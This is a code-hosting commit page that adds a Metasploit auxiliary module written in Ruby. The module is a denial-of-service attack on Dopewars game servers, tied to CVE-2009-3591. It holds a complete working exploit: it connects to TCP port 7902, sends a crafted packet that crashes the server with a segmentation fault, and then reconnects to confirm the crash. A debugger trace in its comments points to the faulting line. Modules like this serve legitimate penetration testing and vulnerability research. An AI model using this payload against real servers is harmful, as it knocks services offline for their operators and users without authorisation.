Skip to content

Commit 0e607f8

Browse files
committed
added dopewars module
1 parent 2684e61 commit 0e607f8

File tree

1 file changed

+57
-0
lines changed

1 file changed

+57
-0
lines changed
Lines changed: 57 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,57 @@
1+
# Dopewars DOS attack.
2+
3+
require 'msf/core'
4+
5+
6+
class Metasploit3 < Msf::Auxiliary
7+
8+
include Msf::Exploit::Remote::Tcp
9+
include Msf::Auxiliary::Dos
10+
11+
def initialize(info = {})
12+
super(update_info(info,
13+
'Name' => 'Dopewars Denial of Service',
14+
'Description' => %q{
15+
This module sends a specially-crafted packet to a Dopewars
16+
server, causing a SEGFAULT.
17+
},
18+
'Author' => [ 'dougsko' ],
19+
'License' => GPL_LICENSE,
20+
'Version' => '0.1.0',
21+
'References' =>
22+
[
23+
[ 'URL', 'None' ],
24+
[ 'BID', 'None' ],
25+
[ 'CVE', 'CVE-2009-3591' ],
26+
]))
27+
28+
register_options([Opt::RPORT(7902),], self.class)
29+
end
30+
31+
def run
32+
connect
33+
34+
# jet command
35+
# Program received signal SIGSEGV, Segmentation fault.
36+
# [Switching to Thread 0xb74916c0 (LWP 30638)]
37+
# 0x08062f6e in HandleServerMessage (buf=0x8098828 "", Play=0x809a000) at
38+
# serverside.c:525
39+
# 525 dopelog(4, LF_SERVER, "%s jets to %s",
40+
41+
pkt = "foo^^Ar1111111\n^^Acfoo\n^AV65536\n"
42+
print_status("Sending dos packet...")
43+
sock.put(pkt)
44+
disconnect
45+
46+
print_status("Checking for success...")
47+
sleep 2
48+
begin
49+
connect
50+
rescue ::Interrupt
51+
raise $!
52+
rescue ::Rex::ConnectionRefused
53+
print_status("Dopewars server succesfully shut down!")
54+
end
55+
end
56+
57+
end

0 commit comments

Comments
 (0)